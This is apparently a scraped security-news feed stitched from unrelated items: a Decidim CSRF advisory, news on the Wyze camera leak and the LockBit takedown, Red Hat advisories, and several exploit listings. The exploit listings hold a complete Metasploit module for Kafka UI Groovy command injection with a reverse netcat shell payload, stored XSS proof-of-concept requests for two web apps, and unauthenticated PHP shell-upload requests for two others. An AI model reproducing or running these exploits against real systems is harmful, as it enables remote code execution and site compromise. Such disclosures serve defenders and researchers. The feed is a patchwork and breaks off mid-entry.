### Impact
The CSRF authenticity token check is currently disabled for the questionnaire templates preview as per:
https://github.com/decidim/decidim/blob/3187bdfd40ea1c57c2c12512b09a7fec0b2bed08/decidim-templates/app/controllers/decidim/templates/admin/questionnaire_templates_controller.rb#L11

This was introduced by this commit in the PR that introduced this feature (#6247):
https://github.com/decidim/decidim/pull/6247/commits/5542227be66e3b6d7530f5b536069bce09376660

The issue does not imply a serious security thread as you need to have access also to the session cookie in order to see this resource. This URL does not allow modifying the resource but it may allow attackers to gain access to information which was not meant to be public.

### Patches
#11743

### Workarounds
Disable the templates functionality or remove all available templates.

### References
#11743

**Package**

bundler decidim-templates (RubyGems)

**Affected versions**

\>= 0.23.0, < 0.27.5

**Patched versions**

0.27.5

**Description**

**Impact**

The CSRF authenticity token check is currently disabled for the questionnaire templates preview as per:  
https://github.com/decidim/decidim/blob/3187bdfd40ea1c57c2c12512b09a7fec0b2bed08/decidim-templates/app/controllers/decidim/templates/admin/questionnaire\_templates\_controller.rb#L11

This was introduced by this commit in the PR that introduced this feature (#6247):  
decidim/decidim@5542227

The issue does not imply a serious security thread as you need to have access also to the session cookie in order to see this resource. This URL does not allow modifying the resource but it may allow attackers to gain access to information which was not meant to be public.

**Patches**

#11743

**Workarounds**

Disable the templates functionality or remove all available templates.

**References**

#11743

**References**

*   GHSA-f3qm-vfc3-jg6v
*   decidim/decidim#11743

 andreslucena published to decidim/decidim

Feb 20, 2024

Published to the GitHub Advisory Database

Feb 20, 2024

Reviewed

Feb 20, 2024

Last updated

Feb 20, 2024

GHSA-f3qm-vfc3-jg6v: Possible CSRF attack at questionnaire templates preview

By Deeba Ahmed
Third-Party Library Blamed for Wyze Camera Security Lapse.
This is a post from HackRead.com Read the original post: Wyze Cameras Glitch: 13,000 Users Saw Footage from Others’ Homes

The privacy breach, as per Wyze, occurred when it was restoring cameras, causing customers to see mysterious images/video footage in their Events tab.

On Friday, Wyze cameras **reportedly** allowed a whopping 13,000 customers to access unauthorized images and video from cameras installed in other homes. Reports began surfacing among Wyze Discord users as early as 4 AM ET, spreading rapidly by 6 AM ET. By 1 PM ET, some Wyze owners reported their devices were back online.

The privacy breach, as per Wyze, occurred when it was restoring cameras, causing customers to see mysterious images/video footage in their Events tab. The company disabled access to this tab and initiated an investigation. 

According to co-founder David Crosby, the issue initially impacted 14 customers and escalated to 13,000 customers. Wyze blamed the outage on a technical glitch due to an Amazon Web Service partner issue but has not provided details. The company sent an **email** titled “An Important Security Message from Wyze” to customers to apologize and share details.

“The outage originated from our partner AWS and took down Wyze devices for several hours early Friday morning. If you tried to view live cameras or Events during that time, you likely weren’t able to. We’re very sorry for the frustration and confusion this caused,” Wyze’s email read.

Wyze claims the incident involved a third-party caching client library, which was impacted by high load conditions and devices’ simultaneous online activity. The library mixed up device ID and user ID mapping, connecting data to incorrect accounts. Wyze blocked the Events tab and added a verification layer for the app’s Event Video section. Despite that Wyze noted that 99.75 percent of accounts remained unaffected, however, users have reported seeing thumbnails and Event Videos from other cameras.

It is worth noting that this is the second incident involving Wyze customers seeing feeds from un-owned cameras through its online viewer. In September, 2,300 people were able to see 10 strangers’ feeds for 40 minutes.

Wyze blamed a “web caching issue” for the issue and implemented technical measures to prevent recurrence. Bitdefender also **disclosed** security vulnerabilities with Wyze cameras in 2022, which allowed hackers to access feeds from un-owned cameras and strangers’ SD cards.

However, Wyze isn’t the only company experiencing data leaks or breaches. Security cameras frequently become targets of hacking and are prone to vulnerabilities leading to private data exposure. In September 2023, a Vietnam-based group was **discovered** selling private footage from hacked cameras, advertised as “dark corners” and “hot scenes.” The breach was attributed to poor password hygiene.

To protect your security camera, ensure regularly updating firmware, using strong and unique passwords, securing your home network with **Wi-Fi passwords** and WPA3 encryption, and avoiding using a device with default credentials.

****RELATED ARTICLES****

1.  **ThroughTek Flaw Exposed Millions of IoT Cameras to Spying**
2.  **Whitehat hacker shows how to detect hidden cameras in hotels**
3.  **3TB of clips from exposed home security cameras posted online**
4.  **This creepy site shows live footage from 73K Private Security Cameras**
5.  **Israeli Rabbi arrested for hacking CCTV cam at women’ bathing suit shop**

Wyze Cameras Glitch: 13,000 Users Saw Footage from Others’ Homes

U.S. and U.K. authorities have seized the darknet websites run by LockBit, a prolific and destructive ransomware group that has claimed more than 2,000 victims worldwide and extorted over $120 million in payments. Instead of listing data stolen from ransomware victims who didn't pay, LockBit's victim shaming website now offers free recovery tools, as well as news about arrests and criminal charges involving LockBit affiliates.

U.S. and U.K. authorities have seized the darknet websites run by **LockBit**, a prolific and destructive ransomware group that has claimed more than 2,000 victims worldwide and extorted over $120 million in payments. Instead of listing data stolen from ransomware victims who didn’t pay, LockBit’s victim shaming website now offers free recovery tools, as well as news about arrests and criminal charges involving LockBit affiliates.

Investigators used the existing design on LockBit’s victim shaming website to feature press releases and free decryption tools.

Dubbed “Operation Cronos,” the law enforcement action involved the seizure of nearly three-dozen servers; the arrest of two alleged LockBit members; the unsealing of two indictments; the release of a free LockBit decryption tool; and the freezing of more than 200 cryptocurrency accounts thought to be tied to the gang’s activities.

LockBit members have executed attacks against thousands of victims in the United States and around the world, according to the **U.S. Department of Justice** (DOJ). First surfacing in September 2019, the gang is estimated to have made hundreds of millions of U.S. dollars in ransom demands, and extorted over $120 million in ransom payments.

LockBit operated as a ransomware-as-a-service group, wherein the ransomware gang takes care of everything from the bulletproof hosting and domains to the development and maintenance of the malware. Meanwhile, affiliates are solely responsible for finding new victims, and can reap 60 to 80 percent of any ransom amount ultimately paid to the group.

A statement on Operation Cronos from the European police agency Europol said the months-long infiltration resulted in the compromise of LockBit’s primary platform and other critical infrastructure, including the takedown of 34 servers in the Netherlands, Germany, Finland, France, Switzerland, Australia, the United States and the United Kingdom. Europol said two suspected LockBit actors were arrested in Poland and Ukraine, but no further information has been released about those detained.

The DOJ today unsealed indictments against two Russian men alleged to be active members of LockBit. The government says Russian national **Artur Sungatov** used LockBit ransomware against victims in manufacturing, logistics, insurance and other companies throughout the United States.

**Ivan Gennadievich Kondratyev**, a.k.a. “Bassterlord,” allegedly deployed LockBit against targets in the United States, Singapore, Taiwan, and Lebanon. Kondratyev is also charged (PDF) with three criminal counts arising from his alleged use of the Sodinokibi (aka “REvil“) ransomware variant to encrypt data, exfiltrate victim information, and extort a ransom payment from a corporate victim based in Alameda County, California.

With the indictments of Sungatov and Kondratyev, a total of five LockBit affiliates now have been officially charged. In May 2023, U.S. authorities unsealed indictments against two alleged LockBit affiliates, **Mikhail “Wazawaka” Matveev** and **Mikhail Vasiliev**.

Vasiliev, 35, of Bradford, Ontario, Canada, is in custody in Canada awaiting extradition to the United States (the complaint against Vasiliev is at this PDF). Matveev remains at large, presumably still in Russia. In January 2022, KrebsOnSecurity published Who is the Network Access Broker ‘Wazawaka,’ which followed clues from Wazawaka’s many pseudonyms and contact details on the Russian-language cybercrime forums back to a 31-year-old Mikhail Matveev from Abaza, RU.

An FBI wanted poster for Matveev.

In June 2023, Russian national **Ruslan Magomedovich Astamirov** was charged in New Jersey for his participation in the LockBit conspiracy, including the deployment of LockBit against victims in Florida, Japan, France, and Kenya. Astamirov is currently in custody in the United States awaiting trial.

LockBit was known to have recruited affiliates that worked with multiple ransomware groups simultaneously, and it’s unclear what impact this takedown may have on competing ransomware affiliate operations. The security firm **ProDaft** said on Twitter/X that the infiltration of LockBit by investigators provided “in-depth visibility into each affiliate’s structures, including ties with other notorious groups such as FIN7, Wizard Spider, and EvilCorp.”

In a lengthy thread about the LockBit takedown on the Russian-language cybercrime forum XSS, one of the gang’s leaders said the **FBI** and the U.K.’s **National Crime Agency** (NCA) had infiltrated its servers using a known vulnerability in PHP, a scripting language that is widely used in Web development.

Several denizens of XSS wondered aloud why the PHP flaw was not flagged by LockBit’s vaunted “Bug Bounty” program, which promised a financial reward to affiliates who could find and quietly report any security vulnerabilities threatening to undermine LockBit’s online infrastructure.

This prompted several XSS members to start posting memes taunting the group about the security failure.

“Does it mean that the FBI provided a pentesting service to the affiliate program?,” one denizen quipped. “Or did they decide to take part in the bug bounty program? :):)”

Federal investigators also appear to be trolling LockBit members with their seizure notices. LockBit’s data leak site previously featured a countdown timer for each victim organization listed, indicating the time remaining for the victim to pay a ransom demand before their stolen files would be published online. Now, the top entry on the shaming site is a countdown timer until the public doxing of “LockBitSupp,” the unofficial spokesperson or figurehead for the LockBit gang.

“Who is LockbitSupp?” the teaser reads. “The $10m question.”

In January 2024, LockBitSupp told XSS forum members he was disappointed the FBI hadn’t offered a reward for his doxing and/or arrest, and that in response he was placing a bounty on his own head — offering $10 million to anyone who could discover his real name.

“My god, who needs me?,” LockBitSupp wrote on Jan. 22, 2024. “There is not even a reward out for me on the FBI website. By the way, I want to use this chance to increase the reward amount for a person who can tell me my full name from USD 1 million to USD 10 million. The person who will find out my name, tell it to me and explain how they were able to find it out will get USD 10 million. Please take note that when looking for criminals, the FBI uses unclear wording offering a reward of UP TO USD 10 million; this means that the FBI can pay you USD 100, because technically, it’s an amount UP TO 10 million. On the other hand, I am willing to pay USD 10 million, no more and no less.”

**Mark Stockley**, cybersecurity evangelist at the security firm Malwarebytes, said the NCA is obviously trolling the LockBit group and LockBitSupp.

“I don’t think this is an accident—this is how ransomware groups talk to each other,” Stockley said. “This is law enforcement taking the time to enjoy its moment, and humiliate LockBit in its own vernacular, presumably so it loses face.”

In a press conference today, the FBI said Operation Cronos included investigative assistance from the Gendarmerie-C3N in France; the State Criminal Police Office L-K-A and Federal Criminal Police Office in Germany; Fedpol and Zurich Cantonal Police in Switzerland; the National Police Agency in Japan; the Australian Federal Police; the Swedish Police Authority; the National Bureau of Investigation in Finland; the Royal Canadian Mounted Police; and the National Police in the Netherlands.

The Justice Department said victims targeted by LockBit should contact the FBI at https://lockbitvictims.ic3.gov/ to determine whether affected systems can be successfully decrypted. In addition, the Japanese Police, supported by Europol, have released a recovery tool designed to recover files encrypted by the LockBit 3.0 Black Ransomware.

Feds Seize LockBit Ransomware Websites, Offer Decryption Tools, Troll Affiliates

A command injection vulnerability exists in Kafka UI versions 0.4.0 through 0.7.1 that allows an attacker to inject and execute arbitrary shell commands via the groovy filter parameter at the topic section.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Kafka UI Unauthenticated Remote Command Execution via the Groovy Filter option.',        'Description' => %q{          A command injection vulnerability exists in Kafka ui between `v0.4.0` and `v0.7.1` allowing          an attacker to inject and execute arbitrary shell commands via the `groovy` filter parameter          at the `topic` section.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor          'BobTheShopLifter and Thingstad', # Discovery of the vulnerability CVE-2023-52251        ],        'References' => [          ['CVE', '2023-52251'],          ['URL', 'https://attackerkb.com/topics/ATJ1hTVB8H/cve-2023-52251'],          ['URL', 'https://github.com/BobTheShoplifter/CVE-2023-52251-POC']        ],        'DisclosureDate' => '2023-09-27',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],        'Privileged' => false,        'Targets' => [          [            'Unix/Linux Command',            {              'Platform' => ['unix', 'linux'],              'Arch' => [ARCH_CMD],              'Type' => :unix_cmd,              'Payload' => {                'Encoder' => 'cmd/base64',                'BadChars' => "\x00"              },              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_netcat'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8080,          'SSL' => false        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )  end  def vuln_version?    @version = ''    res = send_request_cgi({      'method' => 'GET',      'ctype' => 'application/json',      'uri' => normalize_uri(target_uri.path, 'actuator', 'info')    })    if res && res.code == 200 && (res.body.include?('build') || res.body.include?('git'))      res_json = res.get_json_document      unless res_json.blank?        if res.body.include?('build')          @version = res_json['build']['version'].delete_prefix('v') # remove v from vx.x.x        elsif res.body.include?('git')          # use case where only the git commit id gets returned without the version information          # determine version using the git commit id to match the first 7 chars of the sha commit stored in data/kafka_ui_versions.json file.          git_commit_id = res_json['git']['commit']['id']          kafka_ui_versions_json = JSON.parse(File.read(::File.join(Msf::Config.data_directory, 'kafka_ui_versions.json'), mode: 'rb'))          unless kafka_ui_versions_json.blank?            # loop thru the list of commits and return the version based a match on the first 7 chars of the sha commit else return nil            kafka_ui_versions_json.each do |tag|              if tag['commit']['sha'][0, 7] == git_commit_id                @version = tag['name'].delete_prefix('v')                break              end            end          end        end      end      return Rex::Version.new(@version) <= Rex::Version.new('0.7.1') && Rex::Version.new(@version) >= Rex::Version.new('0.4.0') if @version.match(/\d\.\d\.\d/)    end    false  end  def get_cluster    res = send_request_cgi({      'method' => 'GET',      'ctype' => 'application/json',      'uri' => normalize_uri(target_uri.path, 'api', 'clusters')    })    if res && res.code == 200 && res.body.include?('status')      res_json = res.get_json_document      unless res_json.blank?        # loop thru list of clusters and return an active cluster with topic count > 0 else return nil        res_json.each do |cluster|          if cluster['status'] == 'online' || cluster['topicCount'] > 0            return cluster['name']          end        end      end    end    nil  end  def create_topic(cluster)    topic_name = Rex::Text.rand_text_alphanumeric(4..10)    post_data = {      name: topic_name.to_s,      partitions: 1,      replicationFactor: 1,      configs:        {          'cleanup.policy': 'delete',          'retention.bytes': '-1'        }    }.to_json    res = send_request_cgi({      'method' => 'POST',      'ctype' => 'application/json',      'uri' => normalize_uri(target_uri.path, 'api', 'clusters', cluster.to_s, 'topics'),      'data' => post_data.to_s    })    if res && res.code == 200 && res.body.include?(topic_name.to_s)      res_json = res.get_json_document      unless res_json.blank?        return res_json['name']      end    end    nil  end  def delete_topic(cluster, topic)    res = send_request_cgi({      'method' => 'DELETE',      'ctype' => 'application/json',      'uri' => normalize_uri(target_uri.path, 'api', 'clusters', cluster.to_s, 'topics', topic.to_s)    })    return true if res && res.code == 200    false  end  def produce_message(cluster, topic)    # Create a dummy message to trigger the groovy script execution    post_data = {      partition: 0,      key: 'null',      content: 'null',      keySerde: 'String',      valueSerde: 'String'    }.to_json    res = send_request_cgi({      'method' => 'POST',      'ctype' => 'application/json',      'uri' => normalize_uri(target_uri.path, 'api', 'clusters', cluster.to_s, 'topics', topic.to_s, 'messages'),      'data' => post_data.to_s    })    return true if res && res.code == 200    false  end  def execute_command(cmd, _opts = {})    payload = "Process p=new ProcessBuilder(\"sh\",\"-c\",\"#{cmd}\").redirectErrorStream(true).start()"    return send_request_cgi({      'method' => 'GET',      'ctype' => 'application/x-www-form-urlencoded',      'uri' => normalize_uri(target_uri.path, 'api', 'clusters', @cluster.to_s, 'topics', @new_topic.to_s, 'messages'),      'vars_get' => {        'q' => payload.to_s,        'filterQueryType' => 'GROOVY_SCRIPT',        'attempt' => 2,        'limit' => 100,        'page' => 0,        'seekDirection' => 'FORWARD',        'keySerde' => 'String',        'valueSerde' => 'String',        'seekType' => 'BEGINNING'      }    })  end  def check    vprint_status("Checking if #{peer} can be exploited.")    return CheckCode::Appears("Kafka-ui version: #{@version}") if vuln_version?    unless @version.blank?      if @version.match(/\d\.\d\.\d/)        return CheckCode::Safe("Kafka-ui version: #{@version}")      else        return CheckCode::Detected("Kafka-ui unknown version: #{@version}")      end    end    CheckCode::Safe  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    vprint_status('Searching for active Kafka cluster...')    @cluster = get_cluster    fail_with(Failure::NotFound, 'Could not find or connect to an active Kafka cluster.') if @cluster.nil?    vprint_good("Active Kafka cluster found: #{@cluster}")    vprint_status('Creating a new topic...')    @new_topic = create_topic(@cluster)    fail_with(Failure::Unknown, 'Could not create a new topic.') if @new_topic.nil?    vprint_good("New topic created: #{@new_topic}")    vprint_status('Trigger Groovy script payload execution by creating a message...')    fail_with(Failure::PayloadFailed, 'Could not trigger the Groovy script payload execution.') unless produce_message(@cluster, @new_topic)    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    end    # cleaning up the mess and remove new created topic    vprint_status('Removing tracks...')    if delete_topic(@cluster, @new_topic)      vprint_good("Successfully deleted topic #{@new_topic}.")    else      print_error("Could not delete topic #{@new_topic}. Manually cleaning required.")    end  endend

Kafka UI 0.7.1 Command Injection

Savsoft Quiz version 6.0 Enterprise suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Savsoft Quiz v6.0 Enterprise - Persistent Cross-Site Scripting# Date: 2024-01-03# Exploit Author: Eren Sen# Vendor: SAVSOFT QUIZ# Vendor Homepage: https://savsoftquiz.com# Software Link: https://savsoftquiz.com/web/index.php/online-demo/# Version: < 6.0# CVE-ID: N/A# Tested on: Kali Linux / Windows 10# Vulnerabilities Discovered Date : 2024/01/03# Persistent Cross Site Scripting (XSS) Vulnerability# Vulnerable Parameter Type: POST# Vulnerable Parameter: quiz_name# Proof of Concepts:https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/edit_quiz/13# HTTP Request:POST /Savsoft_Quizdemk1my5jr/index.php/quiz/insert_quiz/ HTTP/1.1Host: demos1.softaculous.comCookie: ci_session=xxxxxxxxxxxxxxxxxxxxxxxxxContent-Length: 411Cache-Control: max-age=0Sec-Ch-Ua:Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: ""Upgrade-Insecure-Requests: 1Origin: https://demos1.softaculous.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/add_newAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closequiz_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=%3Cp%3Etest%3C%2Fp%3E&start_date=2024-01-04+01%3A00%3A27&end_date=2025-01-03+01%3A00%3A27&duration=10&maximum_attempts=10&pass_percentage=50&correct_score=1&incorrect_score=0&ip_address=&view_answer=1&with_login=1&show_chart_rank=1&camera_req=0&gids%5B%5D=1&quiz_template=Default&question_selection=0&quiz_price=0&gen_certificate=0&certificate_text=

Savsoft Quiz 6.0 Enterprise Cross Site Scripting

SPA-CART CMS version 1.9.0.3 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: SPA-CART CMS - Stored XSS  
# Date: 2024-01-03  
# Exploit Author: Eren Sen  
# Vendor: SPA-Cart  
# Vendor Homepage: https://spa-cart.com/  
# Software Link: https://demo.spa-cart.com/  
# Version: [1.9.0.3]  
# CVE-ID: N/A  
# Tested on: Kali Linux / Windows 10  
# Vulnerabilities Discovered Date : 2024/01/03

# Vulnerability Type: Stored Cross Site Scripting (XSS) Vulnerability  
# Vulnerable Parameter Type: POST  
# Vulnerable Parameter: descr

# Proof of Concept: demo.spa-cart.com/product/258

# HTTP Request:

POST ////admin/products/258 HTTP/2  
Host: demo.spa-cart.com  
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxx; remember=xxxxxxxxxxxxxxxx  
Content-Length: 1906  
Sec-Ch-Ua:  
Accept: */*  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUsO8JxBs6LhB8LSl  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36  
Sec-Ch-Ua-Platform: ""  
Origin: https://demo.spa-cart.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://demo.spa-cart.com////admin/products/258  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="mode"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="sku"

SKU386

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="name"

asdf

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="cleanurl"

Wholesale-DIY-Jewelry-Faceted-70pcs-6-8mm-Red-AB-Rondelle-glass-Crystal-Beads  
------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="avail"

1000

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="price"

0.00

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="list_price"

2

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="weight"

0.00

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categoryid"

42

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categories[]"

8

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categories[]"

37

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="brandid"

4

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="status"

1

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="keywords"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl

Content-Disposition: form-data; name="descr"

<script>alert(1)</script>

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="title_tag"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="meta_keywords"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="meta_description"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl--

SPA-CART CMS 1.9.0.3 Cross Site Scripting

Petrol Pump Management Software version 1.0 suffers from a remote shell upload vulnerability.

# Exploit Title: Petrol pump management software - File Upload Remote Code Execution (RCE) (unauthenticated)  
# Google Dork: N/A  
# Application: Petrol pump management software  
# Date: 20.02.2024  
# Bugs: File Upload Remote Code Execution (RCE) (unauthenticated)  
# Exploit Author: SoSPiro  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html  
# Version: 1.0  
# Tested on: Windows 10 64 bit Wampserver   
# CVE : N/A

## Vulnerability Description:

Due to a security vulnerability in "fuelflow/admin/app/web_crud.php," unauthorized users can upload   
files using the "POST" method. The uploaded files are stored in the "/fuelflow/assets/images" folder.   
This allows malicious individuals to execute unauthorized commands on the system.

## Staus: HIGH-CRITICAL Vulnerability

## Proof of Concept (PoC):

Video:  
https://drive.google.com/file/d/1_jue-UhpASC_XxcUWU-QhMYDrSIehnWx/view

// File upload Request

POST /zerday/fuelflow/admin/app/web_crud.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: multipart/form-data; boundary=---------------------------82750242321210078514140255085  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/zer/fuelflow/admin/web.php  
Cookie: PHPSESSID=1  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1

-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="id"

1  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="old_photo1_img"

test.png  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="photo1"; filename="3.php"  
Content-Type: image/png

<?php phpinfo();?>  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="title"

FuelFlow lite - Developed by Mayuri K. tessss  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="old_photos_img"

test.png  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="photos"; filename=""  
Content-Type: application/octet-stream

-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="sitekey"

test  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="secretkey"

test  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="update"

-----------------------------82750242321210078514140255085--

//  Phpinfo file locaton 

/zerday/fuelflow/assets/images/65d45a6080eca.php

Petrol Pump Management Software 1.0 Shell Upload

Tourism Management System version 2.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Tourism Management System v2.0 - Arbitrary File Upload# Google Dork: N/A# Exploit Author: SoSPiro# Date: 2024-02-18# Vendor Homepage: https://phpgurukul.com# Software Link: https://phpgurukul.com/tourism-management-system-free-download/# Version: 2.0# Tested on: Windows 10 Pro# Impact: Allows admin to upload all files to the web server# CVE : N/A# Exploit Description:The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input.# PoC requestPOST /zer/tms/admin/change-image.php?imgid=1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data; boundary=---------------------------390927495111779706051786831201Content-Length: 361Origin: http://localhostConnection: closeReferer: http://localhost/zer/tms/admin/change-image.php?imgid=1Cookie: PHPSESSID=eqms3ipedmm41hqa1djnu1euhvUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1X-PwnFox-Color: red-----------------------------390927495111779706051786831201Content-Disposition: form-data; name="packageimage"; filename="phpinfo.php"Content-Type: text/plain<?php phpinfo();?>-----------------------------390927495111779706051786831201Content-Disposition: form-data; name="submit"-----------------------------390927495111779706051786831201--===========================================================================================- Response -HTTP/1.1 200 OKDate: Sun, 18 Feb 2024 04:33:37 GMTServer: Apache/2.4.54 (Win64) PHP/8.1.13 mod_fcgid/2.3.10-devX-Powered-By: PHP/8.1.13Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 8146============================================================================================- File location -http://localhost/zer/tms/admin/pacakgeimages/phpinfo.php

Tourism Management System 2.0 Shell Upload

Red Hat Security Advisory 2024-0903-03 - Red Hat AMQ Broker 7.10.6 is now available from the Red Hat Customer Portal. Issues addressed include a bypass vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0903.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat AMQ Broker 7.10.6 release and security updateAdvisory ID:        RHSA-2024:0903-03Product:            Red Hat JBoss AMQAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0903Issue date:         2024-02-20Revision:           03CVE Names:          CVE-2023-44981====================================================================Summary: Red Hat AMQ Broker 7.10.6 is now available from the Red Hat Customer Portal.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms.This release of Red Hat AMQ Broker 7.10.6 includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.Security Fix(es):* (CVE-2023-44981) zookeeper: Authorization Bypass in Apache ZooKeeperFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2023-44981References:https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=jboss.amq.broker&version=7.10.6https://access.redhat.com/documentation/en-us/red_hat_amq_broker/7.10https://bugzilla.redhat.com/show_bug.cgi?id=2243436

Red Hat Security Advisory 2024-0903-03

Red Hat Security Advisory 2024-0894-03 - An update for the mysql:8.0 module is now available for Red Hat Enterprise Linux 8.

